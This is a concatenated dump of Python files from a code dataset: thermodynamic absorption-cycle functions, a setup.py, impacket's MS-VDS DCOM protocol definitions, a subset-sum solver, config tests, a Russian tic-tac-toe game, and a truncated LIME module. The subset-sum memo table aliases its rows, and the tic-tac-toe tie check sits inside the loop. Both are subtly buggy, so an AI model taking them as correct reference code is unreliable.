data.prop.tolist()\n\n lower = prop[int(math.floor(targetcomp /0.05))]\n higher = prop[(int((math.floor(targetcomp /0.05))+1))]\n\n theta = (targetcomp - int(math.floor(targetcomp /0.05))*0.05 ) / ((int((math.floor(targetcomp /0.05))+1))*0.05 - int(math.floor(targetcomp /0.05))*0.05 )\n return (theta * higher) + (1-theta)*lower\n\ndef interpolateAB(targetcomp, T, var):\n # must use the entropy-ammonia-water csv, entropy-ammonia-butane csv, or enthalpy-ammonia-water csv\n\n script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\n rel_path = 'data/mixed/'\n abs_file_path = os.path.join(script_dir, rel_path)\n\n colnames = ['pressure', 'ammoniacomp', 'prop']\n propertyname = ''\n if var is 1:\n propertyname = 'enthalpy'\n else:\n propertyname = 'entropy'\n\n filename = propertyname + '-kjmol-' + str(T) + 'K-ammoniabutane'\n\n data = pandas.read_csv(str(abs_file_path) + '%s.csv' %filename, names=colnames)\n\n ammoniacomp = data.ammoniacomp.tolist()\n prop = data.prop.tolist()\n\n lower = prop[int(math.floor(targetcomp /0.05))]\n higher = prop[(int((math.floor(targetcomp /0.05))+1))]\n\n theta = (targetcomp - int(math.floor(targetcomp /0.05))*0.05 ) / ((int((math.floor(targetcomp /0.05))+1))*0.05 - int(math.floor(targetcomp /0.05))*0.05 )\n return (theta * higher) + (1-theta)*lower\n# This calculates the two mass flowrates and the compositions coming out of the flash drum \n# given a mass flowrate and composition of ammonia coming in\n# inputcomp is the ammonia composition\n# temp is the temperature that the flash drum flashes at\ndef leverrule(inputflow, temp, inputcomp):\n #t-xy of ammonia-water\n #input composition of ammonia\n script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\n rel_path = \"data/txy/\"\n abs_file_path = os.path.join(script_dir, rel_path)\n colnames = ['pressure', 'ammoniacomp', 'temperature', 'vaporwater', 'vaporammonia', 'liquidwater', 'liquidammonia']\n filename = 'txy-ammonia-4bar'\n data = pandas.read_csv( str(abs_file_path) + '%s.csv' %filename, names = colnames)\n\n ammoniacomp = data.ammoniacomp.tolist()\n temperature = data.temperature.tolist()\n vaporammonia = data.vaporammonia.tolist()\n liquidammonia = data.liquidammonia.tolist()\n\n\n index, valuetemp = min(enumerate(temperature), key=lambda x: abs(x[1]-temp))\n\n liquiddistance = inputcomp - liquidammonia[index]\n vapordistance = vaporammonia[index] - inputcomp\n\n vaporflow = symbols('vaporflow')\n system = [\n Eq((vapordistance * vaporflow) + (-1.0*liquiddistance*(float(inputflow) - vaporflow)), 0)\n ]\n \n soln = solve(system, [vaporflow])\n\n # the order is: vapor flow, liquid flow, liquid ammonia composition. vapor ammonia composition\n return soln[vaporflow], (inputflow - soln[vaporflow]) ,liquidammonia[index], vaporammonia[index]\n\n# This calculates the Q of the generator\n# compin is the ammonia composition\ndef Qgenerator(massin, compin, Tgen):\n massout = massin\n\n enthalpyin = interpolateAW(compin, 325, 1 )\n\n enthalpyout = interpolateAW(compin, Tgen, 1)\n\n Qgen = -1*(massin*enthalpyin - massout*enthalpyout)\n\n return Qgen\n# This calculates the S of the flash\n# compin is the ammonia flash\ndef Sgenerator(massin, compin, Qgen, Tgen):\n massout = massin\n\n entropyin = interpolateAW(compin, 325, 2)\n #RAHUL fixed Line 95 - wrong entropy values read in\n entropyout = interpolateAW(compin, Tgen, 2)\n\n Sgen = symbols('Sgen')\n system = Eq((-1 * massin * entropyin ) + (massout*entropyout) + (Qgen/Tgen) - Sgen, 0)\n\n soln = solve([system], Sgen)\n\n return soln[Sgen]\n\ndef Qflash(massin, massvapor, massliquid, compin, vaporammonia, liquidammonia, Tgen):\n\n enthalpyin = interpolateAW( compin, Tgen, 1)\n\n enthalpyoutvapor = interpolateAW(vaporammonia, Tgen, 1)\n\n enthalpyoutliquid = interpolateAW( liquidammonia, Tgen, 1)\n\n Qflash = symbols('Qflash')\n system = Eq(( massin* enthalpyin ) + (-1* massvapor*enthalpyoutvapor) + (-1* massliquid*enthalpyoutliquid) + Qflash, 0)\n\n \n soln = solve([system], [Qflash])\n\n return soln[Qflash]\n# This calculates the S of the flash\n# compin is the ammonia flash\ndef Sflash(massin, massvapor, massliquid, compin, vaporammonia, liquidammonia, Qflash, Tgen):\n\n entropyin = interpolateAW( compin, Tgen, 2)\n\n entropyoutvapor = interpolateAW(vaporammonia, Tgen, 2)\n\n entropyoutliquid = interpolateAW(liquidammonia, Tgen, 2)\n\n Sflash = symbols('Sflash')\n system = Eq(( massin* entropyin ) + (-1* massvapor*entropyoutvapor) + (-1* massliquid*entropyoutliquid) + (Sflash/Tgen) - Qflash, 0)\n\n \n soln = solve([system], Sflash)\n\n return soln[Sflash]\ndef Qevaporator(m2, m3, m5, ya3, ya2, xa5, Tgen):\n\n enthalpym2 = interpolateAW(ya2, Tgen, 1)\n\n enthalpym3 = interpolateAB( ya3, 266, 1)\n #print(enthalpym3)\n enthalpym5 = interpolateAB( xa5, 325, 1)\n #print(enthalpym5)\n\n\n # print(enthalpym2 + enthalpym3 + enthalpym5)\n Qevap = symbols('Qevap')\n system = Eq(( m2 * enthalpym2 ) + (-1* m3*enthalpym3) + (m5*enthalpym5) + Qevap, 0)\n soln = solve([system], Qevap)\n\n #print(type(soln))\n return soln[Qevap]\n\ndef Sevaporator(m2, m3, m5, ya3, ya2, xa5, Qevap, Tgen):\n\n entropym2 = interpolateAW(ya2, Tgen, 2)\n\n entropym3 = interpolateAB( ya3, 266, 2)\n\n entropym5 = interpolateAB( xa5, 325, 2)\n\n Sevap = symbols('Sevap')\n system = Eq(( m2 * entropym2 ) + (-1* m3*entropym3) + (m5*entropym5) + (Qevap/266) - Sevap, 0)\n \n\n soln = solve([system], Sevap)\n\n return soln[Sevap]\n\ndef Qabsorber(m3, m4, m5, m6, ya3, xa4, xa5, xa6, Tgen):\n\n enthalpym3 = interpolateAB( ya3, 266, 1)\n \n enthalpym4 = interpolateAW( xa4, Tgen, 1)\n \n enthalpym5 = interpolateAB(xa5, 325, 1)\n \n enthalpym6 = interpolateAW( xa6, 325, 1)\n \n Qabs = symbols('Qabs')\n system = (m3 * enthalpym3 ) + (m4 * enthalpym4) + (-1*m5 * enthalpym5) + (-1 * m6 * enthalpym6) + Qabs\n \n\n soln = solve([system], Qabs)\n\n return soln[Qabs]\n\n\ndef Sabsorber(m3, m4, m5, m6, ya3, xa4, xa5, xa6, Qabs, Tgen):\n\n entropym3 = interpolateAB( ya3, 266, 2)\n\n entropym4 = interpolateAW( xa4, Tgen, 2)\n\n entropym5 = interpolateAB( xa5, 325, 2)\n\n entropym6 = interpolateAW(xa6, 325, 2)\n\n Sabs = symbols('Sabs')\n system = Eq((m3*entropym3) + (m4 * entropym4) + (-1*m5 * entropym5) + (-1*m6*entropym6) + (Qabs/325)- Sabs, 0)\n \n\n soln = solve([system], Sabs)\n\n return soln[Sabs]"} {"ext": "py", "sha": "1a307224ae5f0e70ae470da0a1bec456b3c60633", "content": "from setuptools import setup, find_packages\nimport versioneer\n\nsetup(\n name=\"pylammpsmpi\",\n version=versioneer.get_version(),\n description=\"Parallel Lammps Python interface\",\n url='https://github.com/pyiron/pylammpsmpi',\n author='Jan Janssen',\n author_email='janssen@mpie.de',\n license='BSD',\n\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Topic :: Scientific/Engineering :: Physics',\n 'License :: OSI Approved :: BSD License',\n 'Intended Audience :: Science/Research',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9'\n ],\n\n keywords='lammps, mpi4py',\n packages=find_packages(exclude=[\"*tests*\"]),\n install_requires=[\n 'mpi4py==3.1.3'\n ],\n cmdclass=versioneer.get_cmdclass(),\n)\n"} {"ext": "py", "sha": "1a307417545ff9bfda87edae6e82843be95b41e9", "content": "# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.\n#\n# This software is provided under under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Author: Alberto Solino (@agsolino)\n#\n# Description:\n# [MS-VDS]: Virtual Disk Service (VDS) Protocol\n# This was used as a way to test the DCOM runtime. Further \n# testing is needed to verify it is working as expected\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC\n#\n# Since DCOM is like an OO RPC, instead of helper functions you will see the \n# classes described in the standards developed. \n# There are test cases for them too. \n#\n\n\nfrom impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantVaryingArray, NDRENUM\nfrom impacket.dcerpc.v5.dcomrt import DCOMCALL, DCOMANSWER, IRemUnknown2, PMInterfacePointer, INTERFACE\nfrom impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, DWORD, SHORT, GUID\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.enum import Enum\nfrom impacket import hresult_errors\nfrom impacket.uuid import string_to_bin\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n if self.error_code in hresult_errors.ERROR_MESSAGES:\n error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]\n error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] \n return 'VDS SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'VDS SessionError: unknown error code: 0x%x' % (self.error_code)\n\n################################################################################\n# CONSTANTS\n################################################################################\n# 1.9 Standards Assignments\nCLSID_VirtualDiskService = string_to_bin('7D1933CB-86F6-4A98-8628-01BE94C9A575')\nIID_IEnumVdsObject = string_to_bin('118610B7-8D94-4030-B5B8-500889788E4E')\nIID_IVdsAdviseSink = string_to_bin('8326CD1D-CF59-4936-B786-5EFC08798E25')\nIID_IVdsAsync = string_to_bin('D5D23B6D-5A55-4492-9889-397A3C2D2DBC')\nIID_IVdsServiceInitialization = string_to_bin('4AFC3636-DB01-4052-80C3-03BBCB8D3C69')\nIID_IVdsService = string_to_bin('0818A8EF-9BA9-40D8-A6F9-E22833CC771E')\nIID_IVdsSwProvider = string_to_bin('9AA58360-CE33-4F92-B658-ED24B14425B8')\nIID_IVdsProvider = string_to_bin('10C5E575-7984-4E81-A56B-431F5F92AE42')\n\nerror_status_t = ULONG\n\n# 2.2.1.1.3 VDS_OBJECT_ID\nVDS_OBJECT_ID = GUID\n\n################################################################################\n# STRUCTURES\n################################################################################\n# 2.2.2.1.3.1 VDS_SERVICE_PROP\nclass VDS_SERVICE_PROP(NDRSTRUCT):\n structure = (\n ('pwszVersion',LPWSTR),\n ('ulFlags',ULONG),\n )\n\nclass OBJECT_ARRAY(NDRUniConformantVaryingArray):\n item = PMInterfacePointer\n\n# 2.2.2.7.1.1 VDS_PROVIDER_TYPE\nclass VDS_PROVIDER_TYPE(NDRENUM):\n class enumItems(Enum):\n VDS_PT_UNKNOWN = 0\n VDS_PT_SOFTWARE = 1\n VDS_PT_HARDWARE = 2\n VDS_PT_VIRTUALDISK = 3\n VDS_PT_MAX = 4\n\n# 2.2.2.7.2.1 VDS_PROVIDER_PROP\nclass VDS_PROVIDER_PROP(NDRSTRUCT):\n structure = (\n ('id',VDS_OBJECT_ID),\n ('pwszName',LPWSTR),\n ('guidVersionId',GUID),\n ('pwszVersion',LPWSTR),\n ('type',VDS_PROVIDER_TYPE),\n ('ulFlags',ULONG),\n ('ulStripeSizeFlags',ULONG),\n ('sRebuildPriority',SHORT),\n )\n\n################################################################################\n# RPC CALLS\n################################################################################\n\n# 3.4.5.2.5.1 IVdsServiceInitialization::Initialize (Opnum 3)\nclass IVdsServiceInitialization_Initialize(DCOMCALL):\n opnum = 3\n structure = (\n ('pwszMachineName', LPWSTR),\n )\n\nclass IVdsServiceInitialization_InitializeResponse(DCOMANSWER):\n structure = (\n ('ErrorCode', error_status_t),\n )\n\n# 3.4.5.2.4.1 IVdsService::IsServiceReady (Opnum 3)\nclass IVdsService_IsServiceReady(DCOMCALL):\n opnum = 3\n structure = (\n )\n\nclass IVdsService_IsServiceReadyResponse(DCOMANSWER):\n structure = (\n ('ErrorCode', error_status_t),\n )\n\n# 3.4.5.2.4.2 IVdsService::WaitForServiceReady (Opnum 4)\nclass IVdsService_WaitForServiceReady(DCOMCALL):\n opnum = 4\n structure = (\n )\n\nclass IVdsService_WaitForServiceReadyResponse(DCOMANSWER):\n structure = (\n ('ErrorCode', error_status_t),\n )\n\n# 3.4.5.2.4.3 IVdsService::GetProperties (Opnum 5)\nclass IVdsService_GetProperties(DCOMCALL):\n opnum = 5\n structure = (\n )\n\nclass IVdsService_GetPropertiesResponse(DCOMANSWER):\n structure = (\n ('pServiceProp', VDS_SERVICE_PROP),\n ('ErrorCode', error_status_t),\n )\n\n# 3.4.5.2.4.4 IVdsService::QueryProviders (Opnum 6)\nclass IVdsService_QueryProviders(DCOMCALL):\n opnum = 6\n structure = (\n ('masks', DWORD),\n )\n\nclass IVdsService_QueryProvidersResponse(DCOMANSWER):\n structure = (\n ('ppEnum', PMInterfacePointer),\n ('ErrorCode', error_status_t),\n )\n\n# 3.1.1.1 IEnumVdsObject Interface\n# 3.4.5.2.1.1 IEnumVdsObject::Next (Opnum 3)\nclass IEnumVdsObject_Next(DCOMCALL):\n opnum = 3\n structure = (\n ('celt', ULONG),\n )\n\nclass IEnumVdsObject_NextResponse(DCOMANSWER):\n structure = (\n ('ppObjectArray', OBJECT_ARRAY),\n ('pcFetched', ULONG),\n ('ErrorCode', error_status_t),\n )\n# 3.4.5.2.14.1 IVdsProvider::GetProperties (Opnum 3)\nclass IVdsProvider_GetProperties(DCOMCALL):\n opnum = 3\n structure = (\n )\n\nclass IVdsProvider_GetPropertiesResponse(DCOMANSWER):\n structure = (\n ('pProviderProp', VDS_PROVIDER_PROP),\n ('ErrorCode', error_status_t),\n )\n\n################################################################################\n# OPNUMs and their corresponding structures\n################################################################################\nOPNUMS = {\n}\n\n################################################################################\n# HELPER FUNCTIONS AND INTERFACES\n################################################################################\nclass IEnumVdsObject(IRemUnknown2):\n def Next(self, celt=0xffff):\n request = IEnumVdsObject_Next()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['celt'] = celt\n try:\n resp = self.request(request, uuid = self.get_iPid())\n except Exception as e:\n resp = e.get_packet()\n # If it is S_FALSE(1) means less items were returned\n if resp['ErrorCode'] != 1:\n raise\n interfaces = list()\n for interface in resp['ppObjectArray']:\n interfaces.append(IRemUnknown2(INTERFACE(self.get_cinstance(), ''.join(interface['abData']), self.get_ipidRemUnknown(), target = self.get_target())))\n return interfaces\n\nclass IVdsProvider(IRemUnknown2):\n def GetProperties(self):\n request = IVdsProvider_GetProperties()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\nclass IVdsServiceInitialization(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self, interface)\n\n def Initialize(self):\n request = IVdsServiceInitialization_Initialize()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['pwszMachineName'] = '\\x00'\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\nclass IVdsService(IRemUnknown2):\n def __init__(self, interface):\n IRemUnknown2.__init__(self, interface)\n\n def IsServiceReady(self):\n request = IVdsService_IsServiceReady()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n try:\n resp = self.request(request, uuid = self.get_iPid())\n except Exception as e:\n resp = e.get_packet()\n return resp \n\n def WaitForServiceReady(self):\n request = IVdsService_WaitForServiceReady()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\n def GetProperties(self):\n request = IVdsService_GetProperties()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n resp = self.request(request, uuid = self.get_iPid())\n return resp \n\n def QueryProviders(self, masks):\n request = IVdsService_QueryProviders()\n request['ORPCthis'] = self.get_cinstance().get_ORPCthis()\n request['ORPCthis']['flags'] = 0\n request['masks'] = masks\n resp = self.request(request, uuid = self.get_iPid())\n return IEnumVdsObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))\n"} {"ext": "py", "sha": "1a3075bea55ac79dc5e8c5c5bceb0b7c00b64e21", "content": "\"\"\"\nThis module contains a dynamic programming algorithm for solving the subset sum\nproblem. See section 6.4 of Algorithm Design by Kleinberg and Tardos.\n\nAn instance of the subset sum problem is defined by a weight capacity and a\ncollection of items, where each item has a weight. A solution is any subset of\nitems for which the total weight does not exceed the capacity. An optimal\nsolution is a solution with maximum total weight.\n\"\"\"\n\ndef compute_opt(c, ws):\n \"\"\"\n Computes the maximum total weight for subproblems of the given instance of\n the subset sum problem with weight capacity c and item weights ws.\n\n TODO document recurrence relation\n \"\"\"\n memo = [[0] * (c + 1)] * len(ws)\n for i in range(len(ws)):\n for j in range(1, c + 1):\n w1 = ws[i] if i > 0 else 0\n if j < ws[i]:\n memo[i][j] = w1\n else:\n w2 = ws[i] + (memo[i - 1][j - ws[i]] if i > 0 else 0)\n memo[i][j] = max(w1, w2)\n return memo\n\ndef find_sol(c, ws, memo):\n \"\"\"\n Finds an optimal solution for the given instance of the subset sum problem\n with weight capacity c and item weights ws, provided maximum total weights\n for subproblems are memoized in memo.\n \"\"\"\n sol = []\n for n in reversed(range(len(ws))):\n if c >= ws[n] and memo[n][c] == ws[n] + memo[n - 1][c - ws[n]]:\n sol.append(n)\n c -= ws[n]\n return sol\n\n# Self-test\nif __name__ == '__main__':\n # Pretty print optimal value and solution\n def pretty(c, ws):\n memo = compute_opt(c, ws)\n sol = find_sol(c, ws, memo)\n print('optimal value : ' + str(memo[-1][c]))\n print('optimal solution: ' + str(sol))\n\n c = 11\n ws = [1, 2, 5, 6, 7]\n\n pretty(c, ws)\n"} {"ext": "py", "sha": "1a30762cc1cd38ff4d7596bf0259444c5fbbf867", "content": "import os\nfrom unittest import TestCase\n\nfrom configservice import Config, MissingEnviron, ErrorFlagTrue\n\n\nclass TestCore(TestCase):\n\n def test__load_env(self):\n # set an env to work with.\n\n os.environ['TEST_ME_X'] = '1'\n\n c = Config()\n\n # Test simple recall.\n res = c.get_env('TEST_ME_X')\n self.assertEqual('1', res)\n\n # Test default value\n res = c.get_env('THIS_DOESNT_EXIST',\n default_value='A')\n self.assertEqual('A', res)\n\n # Test default value where the key does exist (should take the key instead)\n res = c.get_env('TEST_ME_X',\n default_value='A')\n self.assertEqual('1', res)\n\n # Test test mode responses section.\n ######### TEST MODES ############\n c._test_mode = True\n # Test simple recall.\n res = c.get_env('TEST_ME_X', test_response='test_res')\n self.assertEqual('test_res', res)\n\n # Test assigned value where no value assigned\n res = c.get_env('TEST_ME_X',\n default_value=24,\n test_response='test_res')\n self.assertEqual('1', res)\n c._test_mode = False\n ######### End Test Mode Section ############\n\n ######## Check error states. ############\n\n with self.assertRaises(MissingEnviron) as e:\n res = c.get_env('THIS_DOESNT_EXIST', error_flag=True)\n\n with self.assertRaises(ErrorFlagTrue) as e:\n res = c.get_env('THIS_DOESNT_EXIST', error_flag=True, default_value='1')\n\n ###### Check data conversion ###########\n # Test integer\n os.environ['TEST_ME_X'] = '1'\n res = c.get_env('TEST_ME_X', data_type_convert='int')\n self.assertEqual(1, res)\n\n # Test float\n os.environ['TEST_ME_X'] = '1.11'\n res = c.get_env('TEST_ME_X', data_type_convert='float')\n self.assertEqual(1.11, res)\n\n # Test Bool\n os.environ['TEST_ME_X'] = '1'\n res = c.get_env('TEST_ME_X', data_type_convert='bool')\n self.assertTrue(res)\n\n os.environ['TEST_ME_X'] = 'True'\n res = c.get_env('TEST_ME_X', data_type_convert='bool')\n self.assertTrue(res)\n\n os.environ['TEST_ME_X'] = '0'\n res = c.get_env('TEST_ME_X', data_type_convert='bool')\n self.assertFalse(res)\n\n os.environ['TEST_ME_X'] = 'false'\n res = c.get_env('TEST_ME_X', data_type_convert='bool')\n self.assertFalse(res)\n\n # Test list\n os.environ['TEST_ME_X'] = 'a,b,c,d'\n res = c.get_env('TEST_ME_X', data_type_convert='list')\n golden = ['a', 'b', 'c', 'd']\n self.assertListEqual(golden, res)\n\n # Test list int\n os.environ['TEST_ME_X'] = '1,2,3,4,5'\n res = c.get_env('TEST_ME_X', data_type_convert='list_int')\n golden = [1, 2, 3, 4, 5]\n self.assertListEqual(golden, res)\n\n # Test list float\n os.environ['TEST_ME_X'] = '1.2,2,3.6,4.6,5'\n res = c.get_env('TEST_ME_X', data_type_convert='list_float')\n golden = [1.2, 2, 3.6, 4.6, 5]\n self.assertListEqual(golden, res)\n\n # Test default value int\n\n res = c.get_env('TEST_ME_NO', default_value='3', data_type_convert='int')\n self.assertEqual(3, res)\n\n # Test default value int\n c._test_mode = True\n res = c.get_env('TEST_ME_NO', test_response='2', default_value='3', data_type_convert='int')\n self.assertEqual(3, res)\n\n # Test default value int\n c._test_mode = True\n res = c.get_env('TEST_ME_NO', test_response='2', data_type_convert='int')\n self.assertEqual(2, res)\n"} {"ext": "py", "sha": "1a307667d3c1f6c19bc453dabbffc5b8d76d6142", "content": "/usr/local/Cellar/python@2/2.7.15/Frameworks/Python.framework/Versions/2.7/lib/python2.7/abc.py"} {"ext": "py", "sha": "1a30773806d21ab849aa2cc786dcaddd70a0abbb", "content": "#Задача №10, Вариант 6\r\n#Разработайте игру \"Крестики-нолики\". (см. М.Доусон Программируем на Python гл. 6)\r\n\r\n#Данилов Д.А.\r\n#23.05.2016\r\ndef display_instruct():\r\n\tprint(\"\"\"\r\n\t\tДобро пожаловать на ринг грандиознейших интеллектуальных состязаний всех времён.\r\n\t\tТвой мозг и мой процессор сойдутся в схватке за доской игры \"Крестики-нолики\".\r\n\t\tЧтобы сделать ход, введи число от 0 до 8. Числа однозначно соответствуют полям\r\n\t\tдоски - так, как показано ниже:\r\n\t\t0 | 1 | 2\r\n\t\t---------\r\n\t\t3 | 4 | 5\r\n\t\t---------\r\n\t\t6 | 7 | 8\r\n\t\t\"\"\")\r\nX=\"X\"\r\nO=\"O\"\r\nEMPTY=\" \"\r\nTIE=\"Ничья\"\r\nNUM_SQUARES=9\r\ndef ask_yes_no(question):\r\n\tresponse=None\r\n\twhile response not in (\"y\",\"n\"):\r\n\t\tresponse=input(question).lower()\r\n\treturn response\r\ndef ask_number(question, low, high):\r\n\tresponse=None\r\n\twhile response not in range(low, high):\r\n\t\tresponse=int(input(question))\r\n\treturn response\t\r\ndef pieces():\r\n\tgo_first=ask_yes_no(\"Хочешь оставить за собой первый ход? (y/n): \")\r\n\tif go_first==\"y\":\r\n\t\tprint(\"\\nНу что ж, даю тебе фору: играй крестиками.\")\r\n\t\thuman=X\r\n\t\tcomputer=O\r\n\telse:\r\n\t\tprint(\"\\nТвоя удаль тебя погубит... Буду начинать я.\")\r\n\t\tcomputer=X\r\n\t\thuman=O\r\n\treturn computer, human\r\ndef new_board():\r\n\tboard=[]\r\n\tfor square in range(NUM_SQUARES):\r\n\t\tboard.append(EMPTY)\r\n\treturn board\r\ndef display_board(board):\r\n\tprint(\"\\n\\t\", board[0], \"|\", board[1], \"|\", board[2])\r\n\tprint(\"\\t\", \"---------\")\r\n\tprint(\"\\t\", board[3], \"|\", board[4], \"|\", board[5])\r\n\tprint(\"\\t\", \"---------\")\r\n\tprint(\"\\t\", board[6], \"|\", board[7], \"|\", board[8])\r\ndef legal_moves(board):\r\n\tmoves = []\r\n\tfor square in range(NUM_SQUARES):\r\n\t\tif board[square]==EMPTY:\r\n\t\t\tmoves.append(square)\r\n\treturn moves\r\ndef winner(board):\r\n\tWAYS_TO_WIN=((0, 1, 2),\r\n\t\t\t\t(3, 4, 5),\r\n\t\t\t\t(6, 7, 8),\r\n\t\t\t\t(0, 3, 6),\r\n\t\t\t\t(1, 4, 7),\r\n\t\t\t\t(2, 5, 8),\r\n\t\t\t\t(0, 4, 8),\r\n\t\t\t\t(2, 4, 6))\r\n\tfor row in WAYS_TO_WIN:\r\n\t\tif board[row[0]]==board[row[1]]==board[row[2]]!=EMPTY:\r\n\t\t\twinner=board[row[0]]\r\n\t\t\treturn winner\r\n\t\tif EMPTY not in board:\r\n\t\t\treturn TIE\r\n\treturn None\r\ndef human_move(board, human):\r\n\tlegal=legal_moves(board)\r\n\tmove=None\r\n\twhile move not in legal:\r\n\t\tmove=ask_number(\"Твой ход. Выбери одно из полей (0-8):\", 0, NUM_SQUARES)\r\n\t\tif move not in legal:\r\n\t\t\tprint(\"\\nСмешной человек! Это поле уже занято. Выбери другое.\\n\")\r\n\tprint(\"Ладно...\")\r\n\treturn move\r\ndef computer_move(board, computer, human):\r\n\tboard=board[:]\r\n\tBEST_MOVES=(4, 0, 2, 6, 8, 1, 3, 5, 7)\r\n\tprint(\"Я выберу поле номер\", end=\" \")\r\n\tfor move in legal_moves(board):\r\n\t\tboard[move]=computer\r\n\t\tif winner(board)==computer:\r\n\t\t\tprint(move)\r\n\t\t\treturn move\r\n\t\tboard[move] = EMPTY\r\n\tfor move in legal_moves(board):\r\n\t\tboard[move]=human\r\n\t\tif winner(board)==human:\r\n\t\t\tprint(move)\r\n\t\t\treturn move\r\n\t\tboard[move]=EMPTY\r\n\tfor move in BEST_MOVES:\r\n\t\tif move in legal_moves(board):\r\n\t\t\tprint(move)\r\n\t\t\treturn move\r\ndef next_turn(turn):\r\n\tif turn==X:\r\n\t\treturn O\r\n\telse:\r\n\t\treturn X\r\ndef congrat_winner(the_winner, computer, human):\r\n\tif the_winner !=TIE:\r\n\t\tprint(\"Три\", the_winner, \"в ряд!\\n\")\r\n\telse:\r\n\t\tprint(\"Ничья!\\n\")\r\n\tif the_winner==computer:\r\n\t\tprint(\"Kaк я и предсказывал. победа в очередной раз осталась за мной.\\nВот еще один довод в пользу того. что компьютеры превосходят людей решительно во всем.\")\r\n\telif the_winner==human:\r\n\t\tprint(\"О нет, этого не может быть! Неужели ты как-то сумел перехитрить меня, белковый?\\nКлянусь: я, компьютер, не допущу этого больше никогда!\")\r\n\telif the_winner==TIE:\r\n\t\tprint(\"Тебе несказанно повезло, дружок: ты сумел свести игру вничью.\\nРадуйся же сегодняшнему успеху! Завтра уже не суждено его повторить.\")\r\ndef main():\r\n\tdisplay_instruct()\r\n\tcomputer, human=pieces()\r\n\tturn=X\r\n\tboard=new_board()\r\n\tdisplay_board(board)\r\n\twhile not winner(board):\r\n\t\tif turn==human:\r\n\t\t\tmove=human_move(board, human)\r\n\t\t\tboard[move]=human\r\n\t\telse:\r\n\t\t\tmove=computer_move(board, computer, human)\r\n\t\t\tboard[move]=computer\r\n\t\tdisplay_board(board)\r\n\t\tturn=next_turn(turn)\r\n\tthe_winner=winner(board)\r\n\tcongrat_winner(the_winner, computer, human)\r\nmain()\r\ninput(\"\\n\\nНажмите Enter, чтобы выйти.\")\r\n"} {"ext": "py", "sha": "1a3078457d0007ca2e3e43860e318c145ba6d7e8", "content": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nstr = \"\"\"ACS3004 湖南新永利交通科工贸有限公司\nACS3005 三一帕尔菲格特种车装备有限公司\nACS3006 湖南新永利交通科工贸有限公司\"\"\"\n\nprint(str)\n\nitems = str.split(sep='\\n')\nfor i, e in enumerate(items, 1):\n print(i, '. ', e.split(sep=' ')[0])\n\nfor i in range(1):\n print(i)\n"} {"ext": "py", "sha": "1a3079582b7e2a6b5ef23166e20427d75cb6aa50", "content": "\"\"\"\nContains abstract functionality for learning locally linear sparse model.\n\"\"\"\nimport numpy as np\nimport scipy as sp\nfrom sklearn.linear_model import Ridge, lars_path\nfrom sklearn.utils import check_random_state\n\n\nclass LimeBase(object):\n \"\"\"Class for learning a locally linear sparse model from perturbed data\"\"\"\n def __init__(self,\n kernel_fn,\n verbose=False,\n random_state=None):\n \"\"\"Init function\n\n Args:\n kernel_fn: function that transforms an array of distances into an\n array of proximity values (floats).\n verbose: if true, print local prediction values from linear model.\n random_state: an integer or numpy.RandomState that will be used to\n generate random numbers. If None, the random state will be\n initialized using the internal numpy seed.\n \"\"\"\n self.kernel_fn = kernel_fn\n self.verbose = verbose\n self.random_state = check_random_state(random_state)\n\n @staticmethod\n def generate_lars_path(weighted_data, weighted_labels):\n \"\"\"Generates the lars path for weighted data.\n\n Args:\n weighted_data: data that has been weighted by kernel\n weighted_label: labels, weighted by kernel\n\n Returns:\n (alphas, coefs), both are arrays corresponding to the\n regularization parameter and coefficients, respectively\n \"\"\"\n x_vector = weighted_data\n alphas, _, coefs = lars_path(x_vector,\n weighted_labels,\n method='lasso',\n verbose=False)\n return alphas, coefs\n\n def forward_selection(self, data, labels, weights, num_features):\n \"\"\"Iteratively adds features to the model\"\"\"\n clf = Ridge(alpha=0, fit_intercept=True, random_state=self.random_state)\n used_features = []\n for _ in range(min(num_features, data.shape[1])):\n max_ = -100000000\n best = 0\n for feature in range(data.shape[1]):\n if feature in used_features:\n continue\n clf.fit(data[:, used_features + [feature]], labels,\n sample_weight=weights)\n score = clf.score(data[:, used_features + [feature]],\n labels,\n sample_weight=weights)\n if score > max_:\n best = feature\n max_ = score\n used_features.append(best)\n return np.array(used_features)\n\n def feature_selection(self, data, labels, weights, num_features, method):\n \"\"\"Selects features for the model. see explain_instance_with_data to\n understand the parameters.\"\"\"\n if method == 'none':\n return np.array(range(data.shape[1]))\n elif method == 